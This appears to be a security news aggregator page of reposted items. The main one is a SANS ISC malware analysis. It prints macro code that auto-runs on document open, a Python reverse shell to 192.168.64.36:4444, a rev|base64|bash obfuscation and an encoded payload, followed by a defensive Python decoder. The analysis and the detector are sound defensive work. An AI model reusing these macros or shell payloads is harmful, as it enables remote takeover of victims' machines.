Malware Devil

Monday, November 9, 2020

Trump Site Alleging AZ Election Fraud Exposes Voter Data

Slapdash setup of Trump website collecting reports of Maricopa County in-person vote irregularities exposed 163,000 voter data records to fraud, via SQL injection.

The post Trump Site Alleging AZ Election Fraud Exposes Voter Data appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/trump-site-alleging-az-election-fraud-exposes-voter-data/?utm_source=rss&utm_medium=rss&utm_campaign=trump-site-alleging-az-election-fraud-exposes-voter-data

Cyberattack on UVM Health Network Impedes Chemotherapy Appointments

The cyberattack has halted chemotherapy, mammogram and screening appointments, and led to 300 staff being furloughed or reassigned.

The post Cyberattack on UVM Health Network Impedes Chemotherapy Appointments appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/cyberattack-on-uvm-health-network-impedes-chemotherapy-appointments/?utm_source=rss&utm_medium=rss&utm_campaign=cyberattack-on-uvm-health-network-impedes-chemotherapy-appointments

G2 Track Integration

You can use JumpCloud Directory Insights and our G2 Track integration to view your organization’s SaaS usage and engagement at-a-glance.

The post G2 Track Integration appeared first on JumpCloud.

The post G2 Track Integration appeared first on Security Boulevard.


The post G2 Track Integration appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/g2-track-integration/?utm_source=rss&utm_medium=rss&utm_campaign=g2-track-integration

China’s Top Hacking Contest, GitHub Actions, & Vulnonym – ASW #129

China’s top hacking contest turns months of effort into 15 minutes of exploits, an injection flaw in GitHub Actions, understanding post-compromise activity in exploits targeting Solaris and VoIP, security and quality challenges in integrating software from multiple vendors, and CVE naming turns into wibbly wobbly timey wimey stuff!
Visit https://www.securityweekly.com/asw for all the latest episodes!
Show Notes: https://wiki.securityweekly.com/asw129

The post China’s Top Hacking Contest, GitHub Actions, & Vulnonym – ASW #129 appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/chinas-top-hacking-contest-github-actions-vulnonym-asw-129-2/?utm_source=rss&utm_medium=rss&utm_campaign=chinas-top-hacking-contest-github-actions-vulnonym-asw-129-2

DEF CON 28 Safe Mode Ham Radio Village – Swissninja’s ‘The OSTRWERK Initiative’

Many thanks to DEF CON and Conference Speakers for publishing their outstanding presentations, which originally appeared at the organization’s DEFCON 28 SAFE MODE Conference and on the DEF CON YouTube channel. Enjoy!


The post DEF CON 28 Safe Mode Ham Radio Village – Swissninja’s ‘The OSTRWERK Initiative’ appeared first on Security Boulevard.


The post DEF CON 28 Safe Mode Ham Radio Village – Swissninja’s ‘The OSTRWERK Initiative’ appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/def-con-28-safe-mode-ham-radio-village-swissninjas-the-ostrwerk-initiative/?utm_source=rss&utm_medium=rss&utm_campaign=def-con-28-safe-mode-ham-radio-village-swissninjas-the-ostrwerk-initiative

Sharing the Myth

A few months ago, I announced the rebranding of the Apfell framework to Mythic, but the announcements don’t stop there. Over the next few months there will be a series of blogs talking about some of the cool features or agents of Mythic. One of Mythic’s coolest features is the ability to dynamically plug and play new Payload Types or C2 Profiles due to the Docker-ization of every component. The general Mythic services are shown in the traffic flow diagram below:

Mythic tries to be merely a framework in which the operator and developer have complete control over virtually every aspect of their agents. To that end, there should be an easy way for developers to host and manage new Payload Types and C2 Profiles on their own repositories, but still have them hook into Mythic. This has the added benefit of giving payload/C2 developers complete control over the update frequency of their projects without relying on pull requests from the main Mythic repository.

Mythic External Agents

In order to facilitate this process, I released a template repository called Mythic_External_Agent (https://github.com/its-a-feature/Mythic_External_Agent). This repository provides container folders for a Payload Type, C2 Profiles, Agent icons, and corresponding documentation folders.

To leverage this project, simply fork the Mythic_External_Agent repository (or recreate the folder and file structure in your own repository).

The config.json file allows you to customize which components you want to import into your Mythic instance. You might be wondering why you wouldn’t want to just import everything or how things would even work if you didn’t. That’s due to another one of Mythic’s features — your Payload Type and C2 Profile “container” can be Docker, a VM, or any other host.

The Mythic documentation website has instructions on how to turn a VM or a physical host into a Mythic-compatible “container”. This is useful for situations where your agent has very strict requirements for tasking or payload creation that are too much of a hassle (or impossible) to do within Docker. A few examples where this comes to mind:

  • The language or desired output format doesn’t work within Docker
  • Setting up proper toolchains/environments/SDKs to compile to specific OS (such as macOS or specific linux distribution) is impossible or extremely difficult within Linux Docker
  • The compilation requires extra steps with sensitive components that need to be contained to one system (such as developer certs for code signing)
  • You want to free up system resources for compilation or intensive tasks

Installing an External Agent

Mythic includes a special installer script you can run to remotely fetch and install agents. Simply point it to your repository via ./install_agent_from_github.sh https://github.com/path/to/repo and Mythic will clone it down into a temporary directory called temp, parse the config.json to see which folders to copy out to the right locations, then remove the temp folder. At this point, you can do one of two things to get everything up and going:

  • Restart Mythic with sudo ./start_mythic.sh and all of the new Payload Types and C2 Profiles will automatically be pulled in
  • Manually start each Payload Type via sudo ./start_payload_types.sh Agentname and each C2 Profile via sudo ./start_c2_profiles.sh C2Name.

That’s it. All of an agent’s components should now be set up for your Mythic agent.

Mythic Agent Collections

With the external agent capability, developers are able to host their custom agents on any repository that’s git-based (GitHub, BitBucket, GitLab, etc), and are able to do it under their own account. However, this can make it easy to miss agents that exist and lose track of everybody’s amazing work. To help make things easier to find, there is now a MythicAgents organization on GitHub. If you have an agent you would like included with the organization, reach out on Twitter to its_a_feature_ or in the Bloodhound Slack (#mythic channel) and we can get you added. You are still in full control of your agent, but having them in a central group benefits everybody.

The first addition to this collection is Dwight Hohnstein’s Apollo agent.

Apollo is a Windows agent written in C# using the 4.0 .NET Framework designed for SpecterOps training offerings. Be sure to check out Dwight’s upcoming, free SO-CON talk all about Apollo:

If you’re interested in making your own agent, I recommend attending the free SO-CON workshop on how to do it within 2 hours:

Everything for the Hercules agent will be hosted in the MythicAgents organization as well.


Sharing the Myth was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.


The post Sharing the Myth appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/sharing-the-myth/?utm_source=rss&utm_medium=rss&utm_campaign=sharing-the-myth

Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa

This week on Lock and Code, we offer something special for listeners—a backstage pass to a cybersecurity training that we held for employees during Cybersecurity Awareness Month, which ended in October.

The topic? The future of cybersecurity for the Internet of Things.

Our guests, Chief Information Security Officer John Donovan and Security Evangelist and a Director for Malwarebytes Labs Adam Kujawa guide us through some of the future’s most pressing questions. Will we ever run antivirus software on IoT devices? What predictions can we make for how the cybersecurity industry will respond to the next, possible big IoT attack? And what can we do today to stay safe?

This episode was recorded live in front of our fellow Malwarebytes employees (over Zoom, of course, as is tradition during the coronavirus pandemic). The episode even includes a Q&A with our employees.

Tune in to get a glimpse into how Malwarebytes helped its own employees during Cybersecurity Awareness Month, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

Other cybersecurity news

Stay safe, everyone!

The post Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa appeared first on Malwarebytes Labs.

The post Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/lock-and-code-s1ep19-forecasting-iot-cybersecurity-with-john-donovan-and-adam-kujawa-3/?utm_source=rss&utm_medium=rss&utm_campaign=lock-and-code-s1ep19-forecasting-iot-cybersecurity-with-john-donovan-and-adam-kujawa-3

The Joy of Tech® ‘Congrats America’

via the Comic Noggins of Nitrozac and Snaggy at The Joy of Tech®!


The post The Joy of Tech® ‘Congrats America’ appeared first on Security Boulevard.


The post The Joy of Tech® ‘Congrats America’ appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/the-joy-of-tech-congrats-america/?utm_source=rss&utm_medium=rss&utm_campaign=the-joy-of-tech-congrats-america

5 Reasons Why Web Security Is Important to Avoid Ransomware

In the world of IT security in general, 2020 so far could be called the year of ransomware. The news is full of reports of new ransomware attacks and based on the trends so far, we can expect the situation to keep getting worse. Many…


The post 5 Reasons Why Web Security Is Important to Avoid Ransomware appeared first on Acunetix.

The post 5 Reasons Why Web Security Is Important to Avoid Ransomware appeared first on Security Boulevard.


The post 5 Reasons Why Web Security Is Important to Avoid Ransomware appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/5-reasons-why-web-security-is-important-to-avoid-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=5-reasons-why-web-security-is-important-to-avoid-ransomware

Using Cloud Costs to Find Your Crown Jewels


Looking at overall cloud spend can be a common measurement for comparison when determining where your crown jewels data reside. The first step to securing your infrastructure is understanding what assets need to be secured. Data classification is the process of organizing data into categories so it is simple to identify, store, retrieve and protect…

The post Using Cloud Costs to Find Your Crown Jewels appeared first on Security Boulevard.


The post Using Cloud Costs to Find Your Crown Jewels appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/using-cloud-costs-to-find-your-crown-jewels/?utm_source=rss&utm_medium=rss&utm_campaign=using-cloud-costs-to-find-your-crown-jewels

Windows 10, iOS, Chrome, Firefox and Others Hacked at Tianfu Cup Competition

Multiple software products from Adobe, Apple, Google, Microsoft, Mozilla, and Samsung were successfully pwned with previously unseen exploits in Tianfu Cup 2020, the third edition of the international cybersecurity contest held in the city of Chengdu, China.
“Many mature and hard targets have been pwned on this year’s contest,” the event organizers said. “11 out of 16 targets cracked with 23

The post Windows 10, iOS, Chrome, Firefox and Others Hacked at Tianfu Cup Competition appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/windows-10-ios-chrome-firefox-and-others-hacked-at-tianfu-cup-competition-2/?utm_source=rss&utm_medium=rss&utm_campaign=windows-10-ios-chrome-firefox-and-others-hacked-at-tianfu-cup-competition-2

The Limitations of SASE and Zero Trust

While SASE and Zero Trust work well for applications where it’s easy to identify valid users, these frameworks fail to address two specific areas of concern.

The post The Limitations of SASE and Zero Trust appeared first on K2io.

The post The Limitations of SASE and Zero Trust appeared first on Security Boulevard.


The post The Limitations of SASE and Zero Trust appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/the-limitations-of-sase-and-zero-trust/?utm_source=rss&utm_medium=rss&utm_campaign=the-limitations-of-sase-and-zero-trust

How Attackers Brush Up Their Malicious Scripts, (Mon, Nov 9th)

On Friday, I received a bunch of alerts from one of my YARA hunting rules. Several samples were submitted from the same account (through the VT API), from the same country (US), and in a very short period of time. All the submitted files were OLE2 files containing a malicious macro. All of them had a low VT score, so they deserved some investigation. I downloaded the samples and had a look at them.

Indeed all OLE2 files contained the same main() macro:

sub Autoexec()
    Call Main
End Sub

Sub Auto_Open()
    Call Main
End Sub

Sub AutoOpen()
    Call Main
End Sub

Sub Workbook_Open()
    Call Main
End Sub

I extracted the VBA code via oledump and reviewed them chronologically (based on the upload time on VT). Here is the first version of the macro:

Private Sub Main()
  Shell ("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((""192.168.64.36"",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([""/bin/bash"",""-i""]);'")
End Sub

Nothing fancy: a simple macro built on a /bin/bash backdoor. The presence of Python code and the bash shell indicates that the macro is used in a targeted attack. The same goes for the RFC1918 IP address. The port used (4444) probably indicates that the attacker is using a Kali host.

Then, the attacker added a notification popup (for debugging purposes?):

Private Sub Main()
    Shell ("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((""192.168.64.36"",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([""/bin/bash"",""-i""]);'")
    Shell ("osascript -e 'display notification ""Macro executée"" with title ""Microsoft Word"" '")
End Sub

‘osascript’ is a macOS tool that allows executing OSA scripts (AppleScript, JavaScript, etc.)[1]. We learned something new about the target: it uses a macOS device, and the attacker speaks French. We have this string in the OLE2 file:

Attribute VB_Name = "Feuil1" (“Feuille” means “Sheet”)

Also, the displayed notification is in French.

Then the attacker switched to another technique and tried to store the payload in the document comments:

Private Sub Main()
    Dim sc As String
    sc = ActiveDocument.BuiltInDocumentProperties("comments").Value
    Shell (sc)
End Sub

The next step was to obfuscate the payload by reversing the code and encoding it in Base64:

Private Sub Main()
    Dim sc As String
    sc = ActiveDocument.BuiltInDocumentProperties("comments").Value
    sc = Right(sc, Len(sc) - 10)
    Shell ("echo """ & sc & """|rev|base64 -D|bash")
End Sub

Another version of the same technique:

Private Sub Main()
    Dim sc As String
    sc = ActiveDocument.BuiltInDocumentProperties("comments").Value
    Shell ("echo """ & sc & """|rev|base64 -D|bash")
End Sub

The next one is funnier: the attacker used the text2speech capabilities of macOS using the ‘say’ command. 

Private Sub Main()
    Shell ("echo ""KEDI5F2c""|rev|base64 -D|bash")
    Shell ("osascript -e 'display notification ""Macro executée"" with title ""Microsoft Word"" '")
End Sub

And finally the latest version found with the Base64 data directly available in the macro:

Private Sub Main()
    Shell ("echo ""gCnsTKdJSatICLig2chJ2LulmYvIyWowGbhNmLzNXZj9mcwJWdz1Dc7kiMskCKv5WZslmZuMHKyAXdk5ycvByOpEDLpgybuVGbpZmLzhiMwVHZuM3bgsTKwwSKo8mblxWam5ycoIDc1RmLz92OpkCN0QDNsIiNz4CN24CO2EjLykTMigCK0NWZu52bj5yc7kSTBVkUUN1XLN0TT5Cdlt2YvNHLUVkTJ9lRB5Cdlt2YvNHK0V2aj92cuQXZrN2bz1zc7M3bsM3clN2byBnY1NHL0V2aj92cgQncvBXbpdCIj1CIu9Ga0lHc""|rev|base64 -D|bash")
    Shell ("osascript -e 'display notification ""Macro executée"" with title ""Microsoft Word"" '")
End Sub

Note the Base64 data contains the same Python code as seen in the first version.

Based on all those findings, we can probably conclude that the attacker is preparing a macro to compromise a macOS user. Another red-team exercise on its way?
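
A static triage sketch for the echo ...|rev|base64 -D|bash pattern in the macros above, added here as an example and not part of the original diary: it reverses and Base64-decodes the blob in Python without running anything, and reports when the payload is pulled from a document property instead. The function names and the indicator list are this example's own assumptions; the two sample strings are copied from the short macros quoted above.

```python
import base64
import binascii
import re

# Pipeline used by the macros: echo "<data>"|rev|base64 -D|bash
# VBA doubles quotes inside string literals, hence the "" around <data>.
PIPELINE = re.compile(
    r'echo\s+""(?P<arg>.*?)""\s*\|\s*rev\s*\|\s*base64\s+-[dD]\s*\|\s*(?:ba)?sh')
# <data> is a concatenated variable when the source reads: """ & sc & """
VAR_REF = re.compile(r'^"\s*&\s*(?P<var>\w+)\s*&\s*"$')
# Strings worth flagging in a decoded payload (assumed list, extend as needed).
INDICATORS = ("socket", "subprocess", "os.dup2", "/bin/bash", "osascript", "say ")

# Sample macros copied from the diary text (short variants only).
SAMPLE_LITERAL = r'''Private Sub Main()
    Shell ("echo ""KEDI5F2c""|rev|base64 -D|bash")
End Sub'''

SAMPLE_PROPERTY = r'''Private Sub Main()
    Dim sc As String
    sc = ActiveDocument.BuiltInDocumentProperties("comments").Value
    Shell ("echo """ & sc & """|rev|base64 -D|bash")
End Sub'''


def decode_rev_b64(blob):
    """Undo the obfuscation statically: reverse, then Base64-decode."""
    try:
        raw = base64.b64decode(blob[::-1], validate=True)
    except (binascii.Error, ValueError):
        return None  # not valid Base64 once reversed
    return raw.decode("utf-8", errors="replace")


def find_property_source(vba_source, variable):
    """Return the document property a variable is filled from, if any."""
    pattern = re.compile(
        rf'^\s*{re.escape(variable)}\s*=.*?BuiltInDocumentProperties\(\s*"([^"]+)"\s*\)',
        re.M | re.I)
    m = pattern.search(vba_source)
    return m.group(1) if m else None


def triage_macro(vba_source):
    """Report every rev|base64|bash pipeline found in extracted VBA text."""
    findings = []
    for lineno, line in enumerate(vba_source.splitlines(), 1):
        m = PIPELINE.search(line)
        if not m:
            continue
        finding = {"line": lineno, "kind": "literal", "property": None,
                   "decoded": None, "indicators": []}
        var = VAR_REF.match(m.group("arg"))
        if var:
            # Payload is not in the macro itself: point the analyst at its source.
            finding["kind"] = "external"
            finding["property"] = find_property_source(vba_source, var.group("var"))
        else:
            decoded = decode_rev_b64(m.group("arg"))
            if decoded is None:
                finding["kind"] = "undecodable"
            else:
                finding["decoded"] = decoded
                finding["indicators"] = [i for i in INDICATORS if i in decoded]
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for sample in (SAMPLE_LITERAL, SAMPLE_PROPERTY):
        for finding in triage_macro(sample):
            print(finding)
```

Feed it the VBA text extracted with oledump; for an "external" finding the blob has to be read from the named document property before it can be decoded.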

[1] https://osxdaily.com/2016/08/19/run-applescript-command-line-macos-osascript/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The post How Attackers Brush Up Their Malicious Scripts, (Mon, Nov 9th) appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/how-attackers-brush-up-their-malicious-scripts-mon-nov-9th/?utm_source=rss&utm_medium=rss&utm_campaign=how-attackers-brush-up-their-malicious-scripts-mon-nov-9th

3 Takeaways from Sandworm Hacker Group’s Indictment 


The U.S. Department of Justice officially revealed in October what it said were a number of instances of Russian government-sponsored hacking when it formally indicted six members and officers in Russia’s military agency Russian Main Intelligence Directorate (GRU). In addition to naming the members of the hacker group, it was also the first time the U.S…

The post 3 Takeaways from Sandworm Hacker Group’s Indictment  appeared first on Security Boulevard.


The post 3 Takeaways from Sandworm Hacker Group’s Indictment  appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/3-takeaways-from-sandworm-hacker-groups-indictment/?utm_source=rss&utm_medium=rss&utm_campaign=3-takeaways-from-sandworm-hacker-groups-indictment

Body Found in Canada Identified as Neo-Nazi Spam King

The body of a man found shot inside a burned out vehicle in Canada three years ago has been identified as that of Davis Wolfgang Hawke, a prolific spammer and neo-Nazi who led a failed anti-government march on Washington, D.C. in 1999, according to news reports.

Homicide detectives said they originally thought the man found June 14, 2017 in a torched SUV on a logging road in Squamish, British Columbia was a local rock climber known to others in the area as a politically progressive vegan named Jesse James.

Davis Wolfgang Hawke. Image: Spam Kings, by Brian McWilliams.

But according to a report from CTV News, at a press conference late last month authorities said new DNA evidence linked to a missing persons investigation has confirmed the man’s true identity as Davis Wolfgang Hawke.

A key subject of the book Spam Kings by Brian McWilliams, Hawke was a Jewish-born American who’d legally changed his name from Andrew Britt Greenbaum. For many years, Hawke was a big time purveyor of spam emails hawking pornography and male enhancement supplements, such as herbal Viagra.

Hawke had reportedly bragged about the money he earned from spam, but told friends he didn’t trust banks and decided to convert his earnings into gold and platinum bars. That sparked rumors that he had possibly buried his ill-gotten gains on his parents’ Massachusetts property.

In 2005, AOL won a $12.8 million lawsuit against him for relentlessly spamming its users. A year later, AOL won a court judgment authorizing them to dig on that property, although no precious metals were ever found.

More recently, Hawke’s Jesse James identity penned a book called Psychology of Seduction, which claimed to merge the “shady world of the pickup artist with modern science, unraveling the mystery of attraction using evolutionary biology and examining seduction through the lens of social and evolutionary psychology.”

The book’s “about the author” page said James was a “disruptive technology pioneer” who was into rock climbing and was a resident of Squamish. It also claimed James held a PhD in theoretical physics from Stanford, and that he was an officer in the Israeli Defense Force.

It might be difficult to fathom why, but Hawke may have made a few enemies over the years. Spam Kings author McWilliams notes that Hawke changed his name with regularity and used many pseudonyms.

“I could definitely see this guy making someone so mad at him they’d want to kill him,” McWilliams told CTV. “He was a guy who really pushed people that way and was a crook. I mean, he was a conman. That was what he was and I can see how somebody might get mad. I can also see him staging his own death or committing suicide in a fashion like that, if that’s what he chose to do. He was just a perplexing guy. I still don’t feel like I have a handle on him and I spent the better part of a year trying to figure out what made him tick.”

The father of the deceased, Hy Greenbaum, has offered a $10,000 reward to any tipster who can help solve his son’s homicide. British Columbia’s Integrated Homicide Investigation Team also is seeking clues, and can be reached at ihitinfo@rcmp-grc.gc.ca.


The post Body Found in Canada Identified as Neo-Nazi Spam King appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/body-found-in-canada-identified-as-neo-nazi-spam-king/?utm_source=rss&utm_medium=rss&utm_campaign=body-found-in-canada-identified-as-neo-nazi-spam-king

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...